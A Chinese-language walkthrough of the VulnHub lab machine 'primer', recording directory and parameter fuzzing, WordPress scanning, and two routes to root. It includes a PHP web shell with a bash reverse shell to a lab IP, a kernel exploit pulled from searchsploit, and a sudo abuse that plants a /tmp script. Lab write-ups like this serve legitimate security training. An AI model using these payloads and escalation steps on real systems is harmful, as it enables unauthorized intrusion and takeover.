primer

虚假的打法

dirb

dirb http://192.168.1.115 -X .php .txt

-X指定后缀

参数爆破

Fuzzing/Fuzz_For_Web at master · hacknpentest/Fuzzing · GitHub

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt  --hc 404 --hw 500 http://website-ip/index.php?FUZZ=somethingtxt

可以man查看一下hc hw hh区别

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 136   http://192.168.1.115/index.php\?FUZZ\=something 

截图

scrot -s xxx.png

查看图片

xdg-open xxx.png

wordpress扫描

wpscan

发现主题内的secret.php

写入一句话马

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.200.131/443 0>&1'");
?>

触发方式查看上一级描述

查阅得wp的主题在wordpress/wp-content/themes/

即：wordpress/wp-content/themes/twentynineteen/secret.php

本地nc即可获得反弹shell

sudo -l发现提示

sudo -l
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
    (root) NOPASSWD: /home/saket/enc

enc无法读取

www-data@ubuntu:/home/saket$ ls
ls
enc
password.txt
user.txt

uname发现内核太老

是Linux ubuntu 4.10.0-28-generic

searchsploit Linux ubuntu 4.10.0-28

searchsploit -m 45010.c

wget上传payload，编译运行

gcc 45010.c -o getRoot

提权成功

真正的打法

全局搜索铭感文件，比如backup，也可以用脚本来跑

可以看到一个/opt/backup文件夹

www-data@ubuntu:/opt/backup/server_database$ cat backup_pass
cat backup_pass
your password for backup_database file enc is

"backup_password"


Enjoy!

回到/home/saket运行enc

www-data@ubuntu:/home/saket$ sudo ./enc
sudo ./enc
enter password: backup_password
good

www-data@ubuntu:/home/saket$ cat enc.txt
cat enc.txt
nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=

www-data@ubuntu:/home/saket$ cat key.txt
cat key.txt
I know you are the fan of ippsec.
So convert string "ippsec" into md5 hash and use it to gain yourself in your real form.

ippsec的md5

366a74cb3c959de17d61db30591c39d1

for cip in $(cat cipher);do echo 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4='|openssl enc -d -a -$cip -K 3336366137346362336339353964653137643631646233303539316333396431 2>/dev/null;echo $cip;done

Dont worry saket one day we will reach to
our destination very soon. And if you forget
your username then use your old password
==> "tribute_to_ippsec"

Victor,aes-256-ecb

验证

 /home/kali/Desktop/web/vulnhub/primer  echo 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4='|openssl enc -d -a -aes-256-ecb -K 3336366137346362336339353964653137643631646233303539316333396431
Dont worry saket one day we will reach to
our destination very soon. And if you forget
your username then use your old password
==> "tribute_to_ippsec"

Victor,#  

ssh连入

sudo -l发现提示，可以无密码root权限执行/home/victor/undefeated_victor中的内容

$ sudo -l
Matching Defaults entries for saket on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User saket may run the following commands on ubuntu:
    (root) NOPASSWD: /home/victor/undefeated_victor

$ sudo /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
/home/victor/undefeated_victor: 2: /home/victor/undefeated_victor: /tmp/challenge: not found

/tmp目录下查看是否有challenge文件，发现没有challenge文件

cd /tmp
echo '#!/bin/bash' >challenge
echo '/bin/bash' >>challenge
chmod +x challenge
sudo /home/victor/undefeated_victor

最后拿下靶机

$ sudo /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
root@ubuntu:/tmp# whoami
root